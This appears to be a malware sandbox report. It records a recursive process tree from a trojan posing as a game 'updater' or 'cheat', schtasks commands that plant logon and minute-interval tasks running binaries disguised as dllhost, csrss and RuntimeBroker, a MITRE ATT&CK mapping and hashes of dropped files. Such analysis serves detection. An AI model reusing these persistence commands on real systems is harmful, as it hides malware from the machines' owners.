        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        51⤵
        Checks computer location settings
        
        PID:2500
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        52⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        52⤵
        Modifies registry class
        
        PID:5400
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        53⤵
        
        PID:3736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        54⤵
        
        PID:180
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        55⤵
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        52⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        53⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        54⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        54⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        53⤵
        Modifies registry class
        
        PID:1544
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        54⤵
        
        PID:4348
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        55⤵
        
        PID:5968
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        56⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        53⤵
        
        PID:5816
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        54⤵
        
        PID:5828
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        55⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        55⤵
        
        PID:2792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        56⤵
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        54⤵
        Modifies registry class
        
        PID:8
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        55⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        56⤵
        
        PID:5932
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        57⤵
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        54⤵
        Checks computer location settings
        
        PID:5912
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        55⤵
        
        PID:3848
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        55⤵
        Modifies registry class
        
        PID:5244
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        56⤵
        
        PID:8
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        55⤵
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        56⤵
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        56⤵
        Modifies registry class
        
        PID:1568
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        57⤵
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        56⤵
        Checks computer location settings
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        57⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        57⤵
        Modifies registry class
        
        PID:5624
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        58⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        57⤵
        Checks computer location settings
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        58⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        58⤵
        Modifies registry class
        
        PID:5184
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        59⤵
        
        PID:1120
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        58⤵
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        59⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        59⤵
        Modifies registry class
        
        PID:5736
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        60⤵
        
        PID:5680
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        59⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        60⤵
        
        PID:504
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        60⤵
        Modifies registry class
        
        PID:5132
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        61⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        60⤵
        Checks computer location settings
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        61⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        61⤵
        
        PID:760
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        62⤵
        
        PID:5712
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        61⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        62⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        62⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3772
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        63⤵
        
        PID:5160
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        62⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        63⤵
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        63⤵
        Modifies registry class
        
        PID:4852
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        64⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        63⤵
        
        PID:912
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        64⤵
        
        PID:5256
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        64⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2700
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        65⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        64⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        65⤵
        
        PID:5820
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        65⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3276
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        66⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        65⤵
        
        PID:5736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4232,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:8
1⤵
PID:1836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Google\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "LoaderL" /sc MINUTE /mo 5 /tr "'C:\Windows\Registration\CRMLog\Loader.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Loader" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\Loader.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "LoaderL" /sc MINUTE /mo 8 /tr "'C:\Windows\Registration\CRMLog\Loader.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 11 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 12 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4928

C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe
1⤵
PID:2052

C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe
1⤵
PID:5892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log

Filesize
1KB

MD5
bb6a89a9355baba2918bb7c32eca1c94

SHA1
976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2

SHA256
192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b

SHA512
efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RustCheat.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara_Updater.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
966914e2e771de7a4a57a95b6ecfa8a9

SHA1
7a32282fd51dd032967ed4d9a40cc57e265aeff2

SHA256
98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

SHA512
dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b0a78e60bfb279d18fd3d6e7a67411f5

SHA1
9344fe3654a14bc66afb9dc6ea215fabfbe5c906

SHA256
a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb

SHA512
9548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
107102102e02e48f37f5318c7e113c43

SHA1
7fb10fc65c85fb4c050309f0872bc9389dcccc0d

SHA256
3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7

SHA512
b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5b27d0f2e7023b0cb214f2d6320b5387

SHA1
2e5eeea0e9e6fc2162ad375aecddff7ed953d3e4

SHA256
6404e3da4c87b9969bc2ed0fd2a6377b61a7c10dfd70f7141b1d7ce4417cda23

SHA512
6794951bd4520340176063857917bc6f77d88d1acc26956b1af87c8d44393fc31094860b3811b2082765fec238877d2d5684bff9a11eb6efc2d8b8c5703456b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\91bqlp6xJn4BJDs

Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

Download Submit
C:\Users\Admin\AppData\Local\Temp\9TWFtBIRikDbptU\Display\Display.png

Filesize
419KB

MD5
64def942ce1acc25e7671dff14576e8b

SHA1
ae5e42c60d97699d83471cba31e107b2fac34aa8

SHA256
bf75c45427704104f5934df15f523a56280a98be898d9f95f3fa4423e9313b0a

SHA512
842250c71104f553b3816874f30050fd2419520fb18e979193e2382a6a8ff0bd3f7d24590bf0cf313dd391c330b065dfd96b34564061db14d6129d55a6472dd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\L6HSkvzV9EuOcLa

Filesize
56KB

MD5
5be7f6f434724dfcc01e8b2b0e753bbe

SHA1
ef1078290de6b5700ff6e804a79beba16c99ba3e

SHA256
4064b300ca1a67a3086e1adb18001c0017384b8f84ff4c0e693858889cef2196

SHA512
3b470c3ad5be3dd7721548021a818034584bbd88237b1710ce52ac67e04126fff4592c02f5868ebda72f662ec8c5f7fc4d0a458f49fe5eb47e024a5c50935ee2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Loader.exe

Filesize
139KB

MD5
8f77f8b13b914f358059e3f7b9ddab70

SHA1
d406a28486b4dd881c454e526e149b98c0ec8462

SHA256
c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6

SHA512
b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad

Download Submit
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

Filesize
231KB

MD5
ff8f5c2670894f74456e534b34d6a8fe

SHA1
e0b35ae06f68adf07e4616da8e91bb1f935e492a

SHA256
d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37

SHA512
a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff

Download Submit
C:\Users\Admin\AppData\Local\Temp\XClient.exe

Filesize
60KB

MD5
28ff989c1d462f567aabb9c5ba76456b

SHA1
24be926b14f64f6a9f5b8248d1618bae9a7fc0b2

SHA256
a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d

SHA512
2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yny4dbjw.ht0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aDkoXl2NVSRU0ly

Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\AppData\Local\Temp\sol.exe

Filesize
2.1MB

MD5
25daefc71be60b76cb49fc81424d768d

SHA1
48be475dd36b433d62d4f7fed9b4d81a90122dee

SHA256
1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a

SHA512
e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
C:\hostNet\bridgeblockportComBroker.exe

Filesize
1.8MB

MD5
8ccc428a5a6f6139dc191d332f3de08b

SHA1
ae550a8fb67deeb1350020aa3fe8b0339db6bc71

SHA256
801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749

SHA512
1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

Download Submit
C:\hostNet\rlqSVEj.vbe

Filesize
230B

MD5
92408a105526970fa12ef23225de61ae

SHA1
bf70e8e671c10bf85771b2b8dd4549766cf79582

SHA256
b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10

SHA512
56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043

Download Submit
C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat

Filesize
83B

MD5
02d21af8c5d6e8e0240a01325bcc4154

SHA1
ce58641040b6fe35d465a8a6932c277c7ff37ee5

SHA256
31498b70dce38481c709a35f22dbab0bde2be880abe88d6c90b7a96bf9f070b7

SHA512
758201561db3058e8d6d18c9a838fd49aa612fe0ef544479cc5776e4618ee4e90245b41b1bdb90257298c27fb6ee2589a262f8143816fa091be88a1ca977f7e8

Download Submit
\??\c:\Program Files (x86)\Microsoft\Edge\Application\CSC421E32B0FE4E49CA8B405B3551F9DCDF.TMP

Filesize
1KB

MD5
b5189fb271be514bec128e0d0809c04e

SHA1
5dd625d27ed30fca234ec097ad66f6c13a7edcbe

SHA256
e1984ba1e3ff8b071f7a320a6f1f18e1d5f4f337d31dc30d5bdfb021df39060f

SHA512
f0fcb8f97279579beb59f58ea89527ee0d86a64c9de28300f14460bec6c32dda72f0e6466573b6654a1e992421d6fe81ae7cce50f27059f54cf9fdca6953602e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\14t0asow\14t0asow.0.cs

Filesize
421B

MD5
e04ec06fc32499f4321fd268615f8d05

SHA1
e6d427299b826164aefd64f3f7e843459ee21f87

SHA256
61be5408c80ef4faa1c7a8829b4cd7810581d7272fa79f14d03aa4cee26d6c70

SHA512
381be5fc2d05616041adbe01649dd8645db70860101673495839c8746f1c0b71642ad76ab9cd9144de9e05c3e11012a36baa9475ce0a5f71f24adbde55dd352e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\14t0asow\14t0asow.cmdline

Filesize
265B

MD5
4e88b79fb2f9741d53ec8279a24351cf

SHA1
